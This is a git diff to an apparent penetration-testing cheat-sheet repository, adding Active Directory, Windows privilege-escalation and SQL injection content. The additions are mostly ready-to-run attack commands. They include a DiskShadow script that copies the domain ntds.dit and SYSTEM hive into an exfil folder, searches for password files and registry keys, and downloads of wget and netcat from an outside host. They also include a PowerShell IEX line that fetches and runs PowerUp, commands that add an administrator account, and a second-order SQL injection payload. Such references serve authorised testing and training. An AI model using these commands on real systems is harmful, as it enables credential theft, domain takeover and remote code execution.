diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 088e243..827841c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -39,6 +39,7 @@ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M met powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks" powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" ``` +* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) ## Most common paths to AD compromise @@ -82,36 +83,59 @@ Get-NetGPOGroup ### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit) -```c +**Using ndtsutil** +```powershell C:\>ntdsutil ntdsutil: activate instance ntds ntdsutil: ifm ifm: create full c:\pentest ifm: quit ntdsutil: quit +``` -or - +**Using Vshadow** +```powershell vssadmin create shadow /for=C : Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit ``` + +**Using DiskShadow (a Windows signed binary)** +```powershell +diskshadow.txt contains : +set context persistent nowriters +add volume c: alias someAlias +create +expose %someAlias% z: +exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit +delete shadows volume %someAlias% +reset + +then: +diskshadow.exe /s c:\diskshadow.txt +dir c:\exfil +reg.exe save hklm\system c:\exfil\system.bak +``` + +**Extract hashes from ntds.dit** then you need to use secretsdump to extract the hashes ```c secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL ``` -Metasploit module +**Alternatives - modules** +Metasploit modules ```c windows/gather/credentials/domain_hashdump ``` - PowerSploit module ``` Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit ``` + + ### Golden Tickets Forge a TGT, require krbtgt key @@ -267,4 +291,5 @@ net group "Domain Admins" hacker2 /add /domain * [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/) * [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/) * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) - *[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) \ No newline at end of file + *[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) + * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md new file mode 100644 index 0000000..55e0f25 --- /dev/null +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -0,0 +1,157 @@ +# Windows - Privilege Escalation +Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/) + + +## Windows Version and Configuration +```powershell +systeminfo | findstr /B /C:"OS Name" /C:"OS Version" +``` + +Architecture +```powershell +wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% +``` + + +List all env variables +```powershell +set +``` + +List all drives +```powershell +wmic logicaldisk get caption || fsutil fsinfo drives +``` + +## User Enumeration + +Get current username +```powershell +echo %USERNAME% || whoami +``` + +List all users +```powershell +net user +whoami /all +``` + +List logon requirements; useable for bruteforcing +```powershell +net accounts +``` + +Get details about a user (i.e. administrator, admin, current user) +```powershell +net user administrator +net user admin +net user %USERNAME% +``` + +List all local groups +```powershell +net localgroup +``` + +Get details about a group (i.e. administrators) +```powershell +net localgroup administrators +``` + +## Network Enumeration + +List all network interfaces +```powershell +ipconfig /all +``` + +List current routing table +```powershell +route print +``` + +List the ARP table +```powershell +arp -A +``` + +List all current connections +```powershell +netstat -ano +``` + +List firware state and current configuration +```powershell +netsh advfirewall firewall dump +``` + +List all network shares +```powershell +net share +``` + +## Looting for passwords + +Search for file contents +```powershell +cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt +``` + +Search for a file with a certain filename +```powershell +dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* +``` + +Search the registry for key names +```powershell +REG QUERY HKLM /F "password" /t REG_SZ /S /K +REG QUERY HKCU /F "password" /t REG_SZ /S /K +``` + +Read a value of a certain sub key +```powershell +REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList +``` + +## Processes Enum +What processes are running? +```powershell +tasklist /v +``` + +Which processes are running as "system" +```powershell +tasklist /v /fi "username eq system" +``` + +Do you have powershell magic? +```powershell +REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion +``` + + +## Uploading / Downloading files +a wget using powershell +```powershell +powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe" +``` + +wget using bitsadmin (when powershell is not present) +```powershell +cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe" +``` + +now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat +```powershell +%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe +``` + +## Spot the weak service using PowerSploit's PowerUP +```powershell +powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks +``` + +## Thanks to +* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) +* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) +* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 9fdfb96..6658cb3 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -1,9 +1,14 @@ # Windows - Using credentials Little tip, if you don't have credentials yet :D -``` +```powershell net user hacker hacker /add net localgroup administrators hacker /add ``` +Some info about your user +```powershell +net user /dom +net user /domain +``` ## Metasploit - SMB diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md index 7e077be..64b97ce 100644 --- a/SQL injection/PostgreSQL Injection.md +++ b/SQL injection/PostgreSQL Injection.md @@ -1,6 +1,6 @@ # POSTGRESQL -## PostgreSQL Comment +## PostgreSQL Comments ``` -- /**/ diff --git a/SQL injection/README.md b/SQL injection/README.md index da25544..5d164b2 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -2,13 +2,19 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application ## Summary -* [Entry point detection](#) -* [DBMS Identification](#) -* [SQL injection using SQLmap](#) -* [Authentication bypass](#) -* [Polyglot injection](#) -* [Insert Statement - ON DUPLICATE KEY UPDATE](#) -* [WAF Bypass](#) +* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md) +* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md) +* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md) +* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md) +* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md) +* [Entry point detection](#entry-point-detection) +* [DBMS Identification](#dbms-identification) +* [SQL injection using SQLmap](#sql-injection-using-sqlmap) +* [Authentication bypass](#authentication-bypass) +* [Polyglot injection](#polyglot-injection-multicontext) +* [Second order injection](#second-order-injection) +* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) +* [WAF Bypass](#waf-bypass) ## Entry point detection @@ -275,6 +281,11 @@ admin") or "1"="1"/* SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ ``` +## Second order injection +```sql +admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' +``` + ## Insert Statement - ON DUPLICATE KEY UPDATE ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by: ```sql @@ -392,7 +403,7 @@ mysql> mysql> select version(); - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/) - [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/) - [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection) -* MSQQL: +* MSSQL: - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php) - [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * ORACLE: diff --git a/SQL injection/SQLite Injection.md b/SQL injection/SQLite Injection.md index 9629246..b157db4 100644 --- a/SQL injection/SQLite Injection.md +++ b/SQL injection/SQLite Injection.md @@ -1,6 +1,6 @@ # SQLite Injection -## SQLite comment +## SQLite comments ```sql -- /**/